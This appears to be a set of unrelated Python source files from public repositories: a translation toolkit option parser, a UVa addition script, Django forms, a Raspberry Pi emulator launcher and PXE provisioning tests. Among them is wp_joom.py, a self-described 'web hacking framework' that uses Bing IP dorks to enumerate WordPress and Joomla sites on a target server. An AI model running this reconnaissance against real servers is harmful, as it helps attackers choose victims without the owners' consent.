return '\\fB%s\\fP' % ("\\fR, \\fP".join(opts))
class RecursiveOptionParser(optparse.OptionParser, object):
"""A specialized Option Parser for recursing through directories."""
def __init__(self, formats, usetemplates=False, allowmissingtemplate=False,
description=None):
"""Construct the specialized Option Parser.
:type formats: Dictionary
:param formats: See :meth:`~.RecursiveOptionParser.setformats`
for an explanation of the formats parameter.
"""
optparse.OptionParser.__init__(self, version="%prog " + __version__.sver,
description=description)
self.setmanpageoption()
self.setprogressoptions()
self.seterrorleveloptions()
self.setformats(formats, usetemplates)
self.passthrough = []
self.allowmissingtemplate = allowmissingtemplate
logging.basicConfig(format="%(name)s: %(levelname)s: %(message)s")
def get_prog_name(self):
return os.path.basename(sys.argv[0])
def setmanpageoption(self):
"""creates a manpage option that allows the optionparser to generate a
manpage"""
manpageoption = ManPageOption(None, "--manpage", dest="manpage",
default=False, action="manpage",
help="output a manpage based on the help")
self.define_option(manpageoption)
def format_manpage(self):
"""returns a formatted manpage"""
result = []
prog = self.get_prog_name()
formatprog = lambda x: x.replace("%prog", prog)
formatToolkit = lambda x: x.replace("%prog", "Translate Toolkit")
result.append('.\\" Autogenerated manpage\n')
result.append('.TH %s 1 "%s" "" "%s"\n' % (prog,
formatToolkit(self.version),
formatToolkit(self.version)))
result.append('.SH NAME\n')
result.append('%s \\- %s\n' % (self.get_prog_name(),
self.description.split('\n\n')[0]))
result.append('.SH SYNOPSIS\n')
result.append('.PP\n')
usage = "\\fB%prog "
usage += " ".join([self.getusageman(option) for option in self.option_list])
usage += "\\fP"
result.append('%s\n' % formatprog(usage))
description_lines = self.description.split('\n\n')[1:]
if description_lines:
result.append('.SH DESCRIPTION\n')
result.append('\n\n'.join([re.sub('\.\. note::', 'Note:', l)
for l in description_lines]))
result.append('.SH OPTIONS\n')
ManHelpFormatter().store_option_strings(self)
result.append('.PP\n')
for option in self.option_list:
result.append('.TP\n')
result.append('%s\n' % str(option).replace('-', '\-'))
result.append('%s\n' % option.help.replace('-', '\-'))
return "".join(result)
def print_manpage(self, file=None):
"""outputs a manpage for the program using the help information"""
if file is None:
file = sys.stdout
file.write(self.format_manpage())
def set_usage(self, usage=None):
"""sets the usage string - if usage not given, uses getusagestring for
each option"""
if usage is None:
self.usage = "%prog " + " ".join([self.getusagestring(option) for option in self.option_list])
else:
super(RecursiveOptionParser, self).set_usage(usage)
def warning(self, msg, options=None, exc_info=None):
"""Print a warning message incorporating 'msg' to stderr and exit."""
if options:
if options.errorlevel == "traceback":
errorinfo = "\n".join(traceback.format_exception(exc_info[0],
exc_info[1], exc_info[2]))
elif options.errorlevel == "exception":
errorinfo = "\n".join(traceback.format_exception_only(exc_info[0], exc_info[1]))
elif options.errorlevel == "message":
errorinfo = str(exc_info[1])
else:
errorinfo = ""
if errorinfo:
msg += ": " + errorinfo
logging.getLogger(self.get_prog_name()).warning(msg)
def getusagestring(self, option):
"""returns the usage string for the given option"""
optionstring = "|".join(option._short_opts + option._long_opts)
if getattr(option, "optionalswitch", False):
optionstring = "[%s]" % optionstring
if option.metavar:
optionstring += " " + option.metavar
if getattr(option, "required", False):
return optionstring
else:
return "[%s]" % optionstring
def getusageman(self, option):
"""returns the usage string for the given option"""
optionstring = "\\fR|\\fP".join(option._short_opts + option._long_opts)
if getattr(option, "optionalswitch", False):
optionstring = "\\fR[\\fP%s\\fR]\\fP" % optionstring
if option.metavar:
optionstring += " \\fI%s\\fP" % option.metavar
if getattr(option, "required", False):
return optionstring
else:
return "\\fR[\\fP%s\\fR]\\fP" % optionstring
def define_option(self, option):
"""Defines the given option, replacing an existing one of the same short
name if neccessary..."""
for short_opt in option._short_opts:
if self.has_option(short_opt):
self.remove_option(short_opt)
for long_opt in option._long_opts:
if self.has_option(long_opt):
self.remove_option(long_opt)
self.add_option(option)
def setformats(self, formats, usetemplates):
"""Sets the format options using the given format dictionary.
:type formats: Dictionary
:param formats: The dictionary *keys* should be:
- Single strings (or 1-tuples) containing an
input format (if not *usetemplates*)
- Tuples containing an input format and
template format (if *usetemplates*)
- Formats can be *None* to indicate what to do
with standard input
The dictionary *values* should be tuples of
outputformat (string) and processor method.
"""
inputformats = []
outputformats = []
templateformats = []
self.outputoptions = {}
self.usetemplates = usetemplates
for formatgroup, outputoptions in six.iteritems(formats):
if isinstance(formatgroup, (str, unicode)) or formatgroup is None:
formatgroup = (formatgroup, )
if not isinstance(formatgroup, tuple):
raise ValueError("formatgroups must be tuples or None/str/unicode")
if len(formatgroup) < 1 or len(formatgroup) > 2:
raise ValueError("formatgroups must be tuples of length 1 or 2")
if len(formatgroup) == 1:
formatgroup += (None, )
inputformat, templateformat = formatgroup
if not isinstance(outputoptions, tuple) or len(outputoptions) != 2:
raise ValueError("output options must be tuples of length 2")
outputformat, processor = outputoptions
if not inputformat in inputformats:
inputformats.append(inputformat)
if not outputformat in outputformats:
outputformats.append(outputformat)
if not templateformat in templateformats:
templateformats.append(templateformat)
self.outputoptions[(inputformat, templateformat)] = (outputformat, processor)
self.inputformats = inputformats
inputformathelp = self.getformathelp(inputformats)
inputoption = optparse.Option("-i", "--input", dest="input",
default=None, metavar="INPUT",
help="read from INPUT in %s" % (inputformathelp))
inputoption.optionalswitch = True
inputoption.required = True
self.define_option(inputoption)
excludeoption = optparse.Option("-x", "--exclude", dest="exclude",
action="append", type="string", metavar="EXCLUDE",
default=["CVS", ".svn", "_darcs", ".git", ".hg", ".bzr"],
help="exclude names matching EXCLUDE from input paths")
self.define_option(excludeoption)
outputformathelp = self.getformathelp(outputformats)
outputoption = optparse.Option("-o", "--output", dest="output",
default=None, metavar="OUTPUT",
help="write to OUTPUT in %s" % (outputformathelp))
outputoption.optionalswitch = True
outputoption.required = True
self.define_option(outputoption)
if self.usetemplates:
self.templateformats = templateformats
templateformathelp = self.getformathelp(self.templateformats)
templateoption = optparse.Option("-t", "--template",
dest="template", default=None, metavar="TEMPLATE",
help="read from TEMPLATE in %s" % (templateformathelp))
self.define_option(templateoption)
def setprogressoptions(self):
"""Sets the progress options."""
self.progresstypes = {
"none": progressbar.NoProgressBar,
"bar": progressbar.HashProgressBar,
"dots": progressbar.DotsProgressBar,
"names": progressbar.MessageProgressBar,
"verbose": progressbar.VerboseProgressBar,
}
progressoption = optparse.Option(None, "--progress", dest="progress",
default="bar",
choices=self.progresstypes.keys(), metavar="PROGRESS",
help="show progress as: %s" % (", ".join(self.progresstypes)))
self.define_option(progressoption)
def seterrorleveloptions(self):
"""Sets the errorlevel options."""
self.errorleveltypes = ["none", "message", "exception", "traceback"]
errorleveloption = optparse.Option(None, "--errorlevel",
dest="errorlevel", default="message",
choices=self.errorleveltypes, metavar="ERRORLEVEL",
help="show errorlevel as: %s" %
(", ".join(self.errorleveltypes)))
self.define_option(errorleveloption)
def getformathelp(self, formats):
"""Make a nice help string for describing formats..."""
formats = sorted(formats)
if None in formats:
formats = filter(lambda format: format is not None, formats)
if len(formats) == 0:
return ""
elif len(formats) == 1:
return "%s format" % (", ".join(formats))
else:
return "%s formats" % (", ".join(formats))
def isrecursive(self, fileoption, filepurpose='input'):
"""Checks if fileoption is a recursive file."""
if fileoption is None:
return False
elif isinstance(fileoption, list):
return True
else:
return os.path.isdir(fileoption)
def parse_args(self, args=None, values=None):
"""Parses the command line options, handling implicit input/output
args."""
(options, args) = super(RecursiveOptionParser, self).parse_args(args, values)
# some intelligent as to what reasonable people might give on the
# command line
if args and not options.input:
if len(args) > 1:
options.input = args[:-1]
args = args[-1:]
else:
options.input = args[0]
args = []
if args and not options.output:
options.output = args[-1]
args = args[:-1]
if args:
self.error("You have used an invalid combination of --input, --output and freestanding args")
if isinstance(options.input, list) and len(options.input) == 1:
options.input = options.input[0]
if options.input is None:
self.error("You need to give an inputfile or use - for stdin ; use --help for full usage instructions")
elif options.input == '-':
options.input = None
return (options, args)
def getpassthroughoptions(self, options):
"""Get the options required to pass to the filtermethod..."""
passthroughoptions = {}
for optionname in dir(options):
if optionname in self.passthrough:
passthroughoptions[optionname] = getattr(options, optionname)
return passthroughoptions
def getoutputoptions(self, options, inputpath, templatepath):
"""Works out which output format and processor method to use..."""
if inputpath:
inputbase, inputext = self.splitinputext(inputpath)
else:
inputext = None
if templatepath:
templatebase, templateext = self.splittemplateext(templatepath)
else:
templateext = None
if (inputext, templateext) in options.outputoptions:
return options.outputoptions[inputext, templateext]
elif (inputext, "*") in options.outputoptions:
outputformat, fileprocessor = options.outputoptions[inputext, "*"]
elif ("*", templateext) in options.outputoptions:
outputformat, fileprocessor = options.outputoptions["*", templateext]
elif ("*", "*") in options.outputoptions:
outputformat, fileprocessor = options.outputoptions["*", "*"]
elif (inputext, None) in options.outputoptions:
return options.outputoptions[inputext, None]
elif (None, templateext) in options.outputoptions:
return options.outputoptions[None, templateext]
elif ("*", None) in options.outputoptions:
outputformat, fileprocessor = options.outputoptions["*", None]
elif (None, "*") in options.outputoptions:
outputformat, fileprocessor = options.outputoptions[None, "*"]
else:
if self.usetemplates:
if inputext is None:
raise ValueError("don't know what to do with input format (no file extension), no template file")
elif templateext is None:
raise ValueError("don't know what to do with input format %s, no template file" %
(os.extsep + inputext))
else:
raise ValueError("don't know what to do with input format %s, template format %s" %
(os.extsep + inputext, os.extsep + templateext))
else:
raise ValueError("don't know what to do with input format %s" %
(os.extsep + inputext))
if outputformat == "*":
if inputext:
outputformat = inputext
elif templateext:
outputformat = templateext
elif ("*", "*") in options.outputoptions:
outputformat = None
else:
if self.usetemplates:
raise ValueError("don't know what to do with input format (no file extension), no template file")
else:
raise ValueError("don't know what to do with input format (no file extension)")
return outputformat, fileprocessor
def initprogressbar(self, allfiles, options):
"""Sets up a progress bar appropriate to the options and files."""
if options.progress in ('bar', 'verbose'):
self.progressbar = \
self.progresstypes[options.progress](0, len(allfiles))
# should use .getChild("progress") but that is only in 2.7
logger = logging.getLogger(self.get_prog_name() + ".progress")
logger.setLevel(logging.INFO)
logger.propagate = False
handler = logging.StreamHandler()
handler.setLevel(logging.INFO)
handler.setFormatter(logging.Formatter())
logger.addHandler(handler)
logger.info("processing %d files...", len(allfiles))
else:
self.progressbar = self.progresstypes[options.progress]()
def getfullinputpath(self, options, inputpath):
"""Gets the absolute path to an input file."""
if options.input:
return os.path.join(options.input, inputpath)
else:
return inputpath
def getfulloutputpath(self, options, outputpath):
"""Gets the absolute path to an output file."""
if options.recursiveoutput and options.output:
return os.path.join(options.output, outputpath)
else:
return outputpath
def getfulltemplatepath(self, options, templatepath):
"""Gets the absolute path to a template file."""
if not options.recursivetemplate:
return templatepath
elif (templatepath is not None and
self.usetemplates and options.template):
return os.path.join(options.template, templatepath)
else:
return None
def run(self):
"""Parses the arguments, and runs recursiveprocess with the resulting
options..."""
(options, args) = self.parse_args()
# this is so derived classes can modify the inputformats etc based on
# the options
options.inputformats = self.inputformats
options.outputoptions = self.outputoptions
self.recursiveprocess(options)
def recursiveprocess(self, options):
"""Recurse through directories and process files."""
if self.isrecursive(options.input, 'input') and getattr(options, "allowrecursiveinput", True):
if not self.isrecursive(options.output, 'output'):
if not options.output:
self.error(optparse.OptionValueError("No output directory given"))
try:
self.warning("Output directory does not exist. Attempting to create")
os.mkdir(options.output)
except IOError as e:
self.error(optparse.OptionValueError("Output directory does not exist, attempt to create failed"))
if isinstance(options.input, list):
inputfiles = self.recurseinputfilelist(options)
else:
inputfiles = self.recurseinputfiles(options)
else:
if options.input:
inputfiles = [os.path.basename(options.input)]
options.input = os.path.dirname(options.input)
else:
inputfiles = [options.input]
options.recursiveoutput = (self.isrecursive(options.output, 'output') and
getattr(options, "allowrecursiveoutput", True))
options.recursivetemplate = (self.usetemplates and
self.isrecursive(options.template, 'template') and
getattr(options, "allowrecursivetemplate", True))
self.initprogressbar(inputfiles, options)
for inputpath in inputfiles:
try:
templatepath = self.gettemplatename(options, inputpath)
# If we have a recursive template, but the template doesn't
# have this input file, let's drop it.
if (options.recursivetemplate and templatepath is None and
not self.allowmissingtemplate):
self.warning("No template at %s. Skipping %s." %
(templatepath, inputpath))
continue
outputformat, fileprocessor = self.getoutputoptions(options, inputpath, templatepath)
fullinputpath = self.getfullinputpath(options, inputpath)
fulltemplatepath = self.getfulltemplatepath(options,
templatepath)
outputpath = self.getoutputname(options, inputpath, outputformat)
fulloutputpath = self.getfulloutputpath(options, outputpath)
if options.recursiveoutput and outputpath:
self.checkoutputsubdir(options, os.path.dirname(outputpath))
except Exception:
self.warning("Couldn't handle input file %s" %
inputpath, options, sys.exc_info())
continue
try:
success = self.processfile(fileprocessor, options,
fullinputpath, fulloutputpath,
fulltemplatepath)
except Exception:
self.warning("Error processing: input %s, output %s, template %s" %
(fullinputpath, fulloutputpath,
fulltemplatepath), options, sys.exc_info())
success = False
self.reportprogress(inputpath, success)
del self.progressbar
def openinputfile(self, options, fullinputpath):
"""Opens the input file."""
if fullinputpath is None:
return sys.stdin
return open(fullinputpath, 'r')
def openoutputfile(self, options, fulloutputpath):
"""Opens the output file."""
if fulloutputpath is None:
return sys.stdout
return open(fulloutputpath, 'w')
def opentempoutputfile(self, options, fulloutputpath):
"""Opens a temporary output file."""
return BytesIO()
def finalizetempoutputfile(self, options, outputfile, fulloutputpath):
"""Write the temp outputfile to its final destination."""
outputfile.reset()
outputstring = outputfile.read()
outputfile = self.openoutputfile(options, fulloutputpath)
outputfile.write(outputstring)
outputfile.close()
def opentemplatefile(self, options, fulltemplatepath):
"""Opens the template file (if required)."""
if fulltemplatepath is not None:
if os.path.isfile(fulltemplatepath):
return open(fulltemplatepath, 'r')
else:
self.warning("missing template file %s" % fulltemplatepath)
return None
def processfile(self, fileprocessor, options, fullinputpath,
fulloutputpath, fulltemplatepath):
"""Process an individual file."""
inputfile = self.openinputfile(options, fullinputpath)
if (fulloutputpath and
fulloutputpath in (fullinputpath, fulltemplatepath)):
outputfile = self.opentempoutputfile(options, fulloutputpath)
tempoutput = True
else:
outputfile = self.openoutputfile(options, fulloutputpath)
tempoutput = False
templatefile = self.opentemplatefile(options, fulltemplatepath)
passthroughoptions = self.getpassthroughoptions(options)
if fileprocessor(inputfile, outputfile, templatefile,
**passthroughoptions):
if tempoutput:
self.warning("writing to temporary output...")
self.finalizetempoutputfile(options, outputfile,
fulloutputpath)
return True
else:
# remove the file if it is a file (could be stdout etc)
if fulloutputpath and os.path.isfile(fulloutputpath):
outputfile.close()
os.unlink(fulloutputpath)
return False
def reportprogress(self, filename, success):
"""Shows that we are progressing..."""
self.progressbar.amount += 1
self.progressbar.show(filename)
def mkdir(self, parent, subdir):
"""Makes a subdirectory (recursively if neccessary)."""
if not os.path.isdir(parent):
raise ValueError("cannot make child directory %r if parent %r does not exist" %
(subdir, parent))
currentpath = parent
subparts = subdir.split(os.sep)
for part in subparts:
currentpath = os.path.join(currentpath, part)
if not os.path.isdir(currentpath):
os.mkdir(currentpath)
def checkoutputsubdir(self, options, subdir):
"""Checks to see if subdir under options.output needs to be created,
creates if neccessary."""
fullpath = os.path.join(options.output, subdir)
if not os.path.isdir(fullpath):
self.mkdir(options.output, subdir)
def isexcluded(self, options, inputpath):
"""Checks if this path has been excluded."""
basename = os.path.basename(inputpath)
for excludename in options.exclude:
if fnmatch.fnmatch(basename, excludename):
return True
return False
def recurseinputfilelist(self, options):
"""Use a list of files, and find a common base directory for them."""
# find a common base directory for the files to do everything
# relative to
commondir = os.path.dirname(os.path.commonprefix(options.input))
inputfiles = []
for inputfile in options.input:
if self.isexcluded(options, inputfile):
continue
if inputfile.startswith(commondir + os.sep):
inputfiles.append(inputfile.replace(commondir + os.sep, "", 1))
else:
inputfiles.append(inputfile.replace(commondir, "", 1))
options.input = commondir
return inputfiles
def recurseinputfiles(self, options):
"""Recurse through directories and return files to be processed."""
dirstack = ['']
join = os.path.join
inputfiles = []
while dirstack:
top = dirstack.pop(-1)
names = os.listdir(join(options.input, top))
dirs = []
for name in names:
inputpath = join(top, name)
if self.isexcluded(options, inputpath):
continue
fullinputpath = self.getfullinputpath(options, inputpath)
# handle directories...
if os.path.isdir(fullinputpath):
dirs.append(inputpath)
elif os.path.isfile(fullinputpath):
if not self.isvalidinputname(options, name):
# only handle names that match recognized input
# file extensions
continue
inputfiles.append(inputpath)
# make sure the directories are processed next time round.
dirs.reverse()
dirstack.extend(dirs)
return inputfiles
def splitext(self, pathname):
"""Splits *pathname* into name and ext, and removes the extsep.
:param pathname: A file path
:type pathname: string
:return: root, ext
:rtype: tuple
"""
root, ext = os.path.splitext(pathname)
ext = ext.replace(os.extsep, "", 1)
return (root, ext)
def splitinputext(self, inputpath):
"""Splits an *inputpath* into name and extension."""
return self.splitext(inputpath)
def splittemplateext(self, templatepath):
"""Splits a *templatepath* into name and extension."""
return self.splitext(templatepath)
def templateexists(self, options, templatepath):
"""Returns whether the given template exists..."""
fulltemplatepath = self.getfulltemplatepath(options, templatepath)
return os.path.isfile(fulltemplatepath)
def gettemplatename(self, options, inputname):
"""Gets an output filename based on the input filename."""
if not self.usetemplates:
return None
if not inputname or not options.recursivetemplate:
return options.template
inputbase, inputext = self.splitinputext(inputname)
if options.template:
for inputext1, templateext1 in options.outputoptions:
if inputext == inputext1:
if templateext1:
templatepath = inputbase + os.extsep + templateext1
if self.templateexists(options, templatepath):
return templatepath
if "*" in options.inputformats:
for inputext1, templateext1 in options.outputoptions:
if (inputext == inputext1) or (inputext1 == "*"):
if templateext1 == "*":
templatepath = inputname
if self.templateexists(options, templatepath):
return templatepath
elif templateext1:
templatepath = inputbase + os.extsep + templateext1
if self.templateexists(options, templatepath):
return templatepath
return None
def getoutputname(self, options, inputname, outputformat):
"""Gets an output filename based on the input filename."""
if not inputname or not options.recursiveoutput:
return options.output
inputbase, inputext = self.splitinputext(inputname)
outputname = inputbase
if outputformat:
outputname += os.extsep + outputformat
return outputname
def isvalidinputname(self, options, inputname):
"""Checks if this is a valid input filename."""
inputbase, inputext = self.splitinputext(inputname)
return ((inputext in options.inputformats) or
("*" in options.inputformats))
| mail-apps/translate | translate/misc/optrecurse.py | Python | gpl-2.0 | 32,292 |
a=['999','1']
max_length=len(max(a,key=len))
tem=0
carry=0
for i in xrange(len(a)):
while len(a[i])<max_length:
a[i]='0'+a[i]
for x in xrange(len(a)):
a[x]=a[x][::-1]
out=''
for x in xrange(max_length):
for i in a:
tem+=int(i[x])
print(i[x],carry)
tem+=carry
carry=0
print(tem)
if tem>9:
carry=tem/10
out=str(tem%10)+out
tem=0
if carry > 0:
out=str(carry)+out
print (out) | ytlai4851/Uva | Python/Q424.py | Python | gpl-2.0 | 392 |
import urllib
import os
import re
from time import sleep
from datetime import date
def welcome(modulename):
print """
|==========================================================|
|====================== [ 404 ] ========================|
|==============[ lordnotfound404@gmail.com ]===============|
|==========[ https://www.facebook.com/404andreas]==========|
|==========================================================|
| **** Web Hacking framwork by 404 *** |
|==========================================================|
"""
print '####### ' + modulename
###########################################################
def serverTargeting(IP):
welcome("perform many dork based scans")
#fil = open(logsfilename+'.txt','a')
#fil.write("[Info] : new target "+now.strftime("%A %d %b %Y")+"IP adress : "+IP)
#print "[Info] : new target "+now.strftime("%A %d %b %Y")+"IP adress : "+IP
#fil.write("[Info] : getting links from Bing")
print " New TARGET " + IP
print "[Info] : getting Hosted domains from Bing"
file2 =open(IP+'hosted.txt','w')
start=0
end=200
sleep(3)
dork = 'IP:'+IP
#print "[info]Getting Websites From Bing ... "
while start <= end :
try:
con = urllib.urlretrieve('http://www.bing.com/search?q='+dork+"&first="+str(start))
#con = con = urllib.urlretrieve('http://www.bing.com/search?q=ip%3A41.203.11.42+%22php%3Fid%3D%22&go=&qs=ds&form=QBLH&filt=all')
conf = open(con[0])
readd=conf.read()
find=re.findall('<h2><a href="(.*?)"',readd)
start = start+10
except IOError:
print "[ERROR]network error "
print "[Info]reconnecting "
sleep(10)
print "[Info]retrying "
try :
for i in range(len(find)):
rez=find[i]
file2.write(rez + '\n')
except IOError:
print "[ERROR]No result found"
print "[Info] : links list saved in file "+IP+"hosted.txt"
print "[Info] : getting wordpress sites from server ...."
file2 =open(IP+'wp_Powred.txt','w')
start=0
end=200
sleep(3)
dork = 'IP:'+IP + " /wp-content/"
#print "[info]Getting Websites From Bing ... "
while start <= end :
try:
con = urllib.urlretrieve('http://www.bing.com/search?q='+dork+"&first="+str(start))
#con = con = urllib.urlretrieve('http://www.bing.com/search?q=ip%3A41.203.11.42+%22php%3Fid%3D%22&go=&qs=ds&form=QBLH&filt=all')
conf = open(con[0])
readd=conf.read()
find=re.findall('<h2><a href="(.*?)"',readd)
start = start+10
except IOError:
print "[ERROR]network error "
print "[Info]reconnecting "
sleep(10)
print "[Info]retrying "
try :
for i in range(len(find)):
rez=find[i]
file2.write(rez + '\n')
except IOError:
print "[ERROR]No result found"
#getsitesbing("IP:"+IP+" /wp-content/" , 'wp_Powred' )
print "[Info] : links list saved in file "+IP+"wp_Powred.txt"
print "[Info] : getting joomla sites from server ...."
file2 =open(IP+'joom_Powred.txt','w')
start=0
end=200
sleep(3)
dork = 'IP:'+IP +" index.php?option=com_content"
#print "[info]Getting Websites From Bing ... "
while start <= end :
try:
con = urllib.urlretrieve('http://www.bing.com/search?q='+dork+"&first="+str(start))
#con = con = urllib.urlretrieve('http://www.bing.com/search?q=ip%3A41.203.11.42+%22php%3Fid%3D%22&go=&qs=ds&form=QBLH&filt=all')
conf = open(con[0])
readd=conf.read()
find=re.findall('<h2><a href="(.*?)"',readd)
start = start+10
except IOError:
print "[ERROR]network error "
print "[Info]reconnecting "
sleep(10)
print "[Info]retrying "
try :
for i in range(len(find)):
rez=find[i]
file2.write(rez + '\n')
except IOError:
print "[ERROR]No result found"
#getsitesbing("IP:"+IP+" index.php?option=com_content" , 'joom_Powred' )
print "[Info] : links saved in file "+IP+"joom_Powred.txt"
print " ALL is done good luck dude !!!!! "
###########################################################
welcome("Joomla and wordpress Sites Finder")
IPadress=raw_input("[INFO] : enter IP adress : ")
serverTargeting(IPadress)
| lordnotfound404/404web | wp_joom.py | Python | gpl-2.0 | 4,272 |
from django import forms
from django.contrib.auth.models import Group
from common.forms import ModelFormWithHelper
from common.helpers import SubmitCancelFormHelper
from community.constants import COMMUNITY_ADMIN
from community.models import Community, CommunityPage
from community.utils import get_groups
from users.models import SystersUser
class CommunityForm(ModelFormWithHelper):
"""Form to edit Community profile"""
class Meta:
model = Community
fields = ('name', 'slug', 'order', 'email', 'mailing_list',
'parent_community', 'website', 'facebook', 'googleplus',
'twitter')
helper_class = SubmitCancelFormHelper
helper_cancel_href = "{% url 'view_community_profile' " \
"community.slug %}"
class AddCommunityPageForm(ModelFormWithHelper):
"""Form to create new CommunityPage. The author and the community of the
page are expected to be provided when initializing the form:
* author - currently logged in user, aka the author of the page
* community - to which Community the CommunityPage belongs
"""
class Meta:
model = CommunityPage
fields = ('title', 'slug', 'order', 'content')
helper_class = SubmitCancelFormHelper
helper_cancel_href = "{% url 'view_community_landing' " \
"community.slug %}"
def __init__(self, *args, **kwargs):
self.author = kwargs.pop('author')
self.community = kwargs.pop('community')
super(AddCommunityPageForm, self).__init__(*args, **kwargs)
def save(self, commit=True):
"""Override save to add author and community to the instance"""
instance = super(AddCommunityPageForm, self).save(commit=False)
instance.author = SystersUser.objects.get(user=self.author)
instance.community = self.community
if commit:
instance.save()
return instance
class EditCommunityPageForm(ModelFormWithHelper):
"""Form to edit a CommunityPage."""
class Meta:
model = CommunityPage
fields = ('slug', 'title', 'order', 'content')
helper_class = SubmitCancelFormHelper
helper_cancel_href = "{% url 'view_community_page' community.slug " \
"object.slug %}"
class PermissionGroupsForm(forms.Form):
"""Form to manage (select/deselect) user permission groups"""
def __init__(self, *args, **kwargs):
self.user = kwargs.pop('user')
community = kwargs.pop('community')
super(PermissionGroupsForm, self).__init__(*args, **kwargs)
# get all community groups and remove community admin group
# from the list of choices
self.groups = list(get_groups(community.name))
admin_group = Group.objects.get(
name=COMMUNITY_ADMIN.format(community.name))
self.groups.remove(admin_group)
choices = [(group.pk, group.name) for group in self.groups]
self.fields['groups'] = forms.\
MultipleChoiceField(choices=choices, label="", required=False,
widget=forms.CheckboxSelectMultiple)
self.member_groups = self.user.get_member_groups(self.groups)
self.fields['groups'].initial = [group.pk for group in
self.member_groups]
self.helper = SubmitCancelFormHelper(
self, cancel_href="{% url 'community_users' community.slug %}")
def save(self):
"""Update the groups of which the user is member of"""
group_pks = [int(pk) for pk in self.cleaned_data['groups']]
for member_group in self.member_groups:
if member_group.pk not in group_pks:
self.user.leave_group(member_group)
for pk in group_pks:
group = Group.objects.get(pk=pk)
if not self.user.is_group_member(group.name):
self.user.join_group(group)
| exploreshaifali/portal | systers_portal/community/forms.py | Python | gpl-2.0 | 3,969 |
#!/usr/bin/env python
import os, Queue
import sys
from time import sleep
from threading import Thread
from libs.qemu import QemuInstance, UARTLineParser
# External
if len(sys.argv) > 1:
print "ARGS:", str(sys.argv)
sys.path.append(os.path.dirname( sys.argv[1] ))
########################################################################
print("=== Starting RPiEmu v0.5 ===")
# Qemu python wrapper that connects to the TCP server
rpi = QemuInstance()
rpi.start()
#####################################################
from models.totumduino import TotumDuino
from models.fabtotum import FABTotum
# FABTotum model
ft = FABTotum()
# Totumduino model
td = TotumDuino(ft)
# Start a TD thread
td.run()
print("* Totumduino thread started")
# UART line parser
parser = UARTLineParser(qemu=rpi, line_handler=td.uart0_transfer)
parser.start()
parser.loop()
# Finish the TD thread
td.finish()
| Colibri-Embedded/FABEmu | examples/rpiemu.py | Python | gpl-2.0 | 909 |
# -*- coding: utf-8 -*-
import fauxfactory
import pytest
from widgetastic.utils import partial_match
from cfme import test_requirements
from cfme.infrastructure.provider import InfraProvider
from cfme.infrastructure.provider.rhevm import RHEVMProvider
from cfme.infrastructure.pxe import get_pxe_server_from_config, get_template_from_config
from cfme.services.service_catalogs import ServiceCatalogs
from cfme.utils import testgen
from cfme.utils.blockers import BZ
from cfme.utils.conf import cfme_data
from cfme.utils.generators import random_vm_name
from cfme.utils.log import logger
pytestmark = [
pytest.mark.meta(server_roles="+automate"),
pytest.mark.usefixtures('uses_infra_providers'),
test_requirements.service,
pytest.mark.tier(2)
]
def pytest_generate_tests(metafunc):
# Filter out providers without provisioning data or hosts defined
argnames, argvalues, idlist = testgen.providers_by_class(
metafunc, [InfraProvider], required_fields=[
['provisioning', 'pxe_server'],
['provisioning', 'pxe_image'],
['provisioning', 'pxe_image_type'],
['provisioning', 'pxe_kickstart'],
['provisioning', 'pxe_template'],
['provisioning', 'datastore'],
['provisioning', 'host'],
['provisioning', 'pxe_root_password'],
['provisioning', 'vlan']
])
pargnames, pargvalues, pidlist = testgen.pxe_servers(metafunc)
argnames = argnames
pxe_server_names = [pval[0] for pval in pargvalues]
new_idlist = []
new_argvalues = []
for i, argvalue_tuple in enumerate(argvalues):
args = dict(zip(argnames, argvalue_tuple))
if args['provider'].type == "scvmm":
continue
pxe_server_name = args['provider'].data['provisioning']['pxe_server']
if pxe_server_name not in pxe_server_names:
continue
pxe_cust_template = args['provider'].data['provisioning']['pxe_kickstart']
if pxe_cust_template not in cfme_data.get('customization_templates', {}).keys():
continue
new_idlist.append(idlist[i])
new_argvalues.append(argvalues[i])
testgen.parametrize(metafunc, argnames, new_argvalues, ids=new_idlist, scope="module")
@pytest.fixture(scope='module')
def pxe_server(appliance, provider):
provisioning_data = provider.data['provisioning']
pxe_server_name = provisioning_data['pxe_server']
return get_pxe_server_from_config(pxe_server_name, appliance=appliance)
@pytest.fixture(scope='module')
def pxe_cust_template(appliance, provider):
provisioning_data = provider.data['provisioning']
pxe_cust_template = provisioning_data['pxe_kickstart']
return get_template_from_config(pxe_cust_template, create=True, appliance=appliance)
@pytest.fixture(scope="function")
def setup_pxe_servers_vm_prov(pxe_server, pxe_cust_template, provisioning):
if not pxe_server.exists():
pxe_server.create()
pxe_server.set_pxe_image_type(provisioning['pxe_image'], provisioning['pxe_image_type'])
@pytest.fixture(scope="function")
def catalog_item(appliance, provider, dialog, catalog, provisioning,
setup_pxe_servers_vm_prov):
# generate_tests makes sure these have values
pxe_template, host, datastore, pxe_server, pxe_image, pxe_kickstart, pxe_root_password,\
pxe_image_type, pxe_vlan = map(
provisioning.get, (
'pxe_template', 'host', 'datastore', 'pxe_server', 'pxe_image', 'pxe_kickstart',
'pxe_root_password', 'pxe_image_type', 'vlan'
)
)
provisioning_data = {
'catalog': {'catalog_name': {'name': pxe_template, 'provider': provider.name},
'provision_type': 'PXE',
'pxe_server': pxe_server,
'pxe_image': {'name': pxe_image},
'vm_name': random_vm_name('pxe_service')},
'environment': {'datastore_name': {'name': datastore},
'host_name': {'name': host}},
'customize': {'root_password': pxe_root_password,
'custom_template': {'name': pxe_kickstart}},
'network': {'vlan': partial_match(pxe_vlan)},
}
item_name = fauxfactory.gen_alphanumeric()
return appliance.collections.catalog_items.create(
provider.catalog_item_type,
name=item_name,
description="my catalog", display_in=True, catalog=catalog,
dialog=dialog, prov_data=provisioning_data)
@pytest.mark.rhv1
@pytest.mark.meta(blockers=[BZ(1633540, forced_streams=['5.10'],
unblock=lambda provider: not provider.one_of(RHEVMProvider)),
BZ(1633516, forced_streams=['5.10'],
unblock=lambda provider: not provider.one_of(RHEVMProvider))])
@pytest.mark.usefixtures('setup_pxe_servers_vm_prov')
def test_pxe_servicecatalog(appliance, setup_provider, provider, catalog_item, request):
"""Tests RHEV PXE service catalog
Metadata:
test_flag: pxe, provision
"""
vm_name = catalog_item.prov_data['catalog']["vm_name"]
request.addfinalizer(
lambda: appliance.collections.infra_vms.instantiate(
"{}0001".format(vm_name), provider).cleanup_on_provider()
)
service_catalogs = ServiceCatalogs(appliance, catalog_item.catalog, catalog_item.name)
service_catalogs.order()
# nav to requests page happens on successful provision
logger.info('Waiting for cfme provision request for service %s', catalog_item.name)
request_description = catalog_item.name
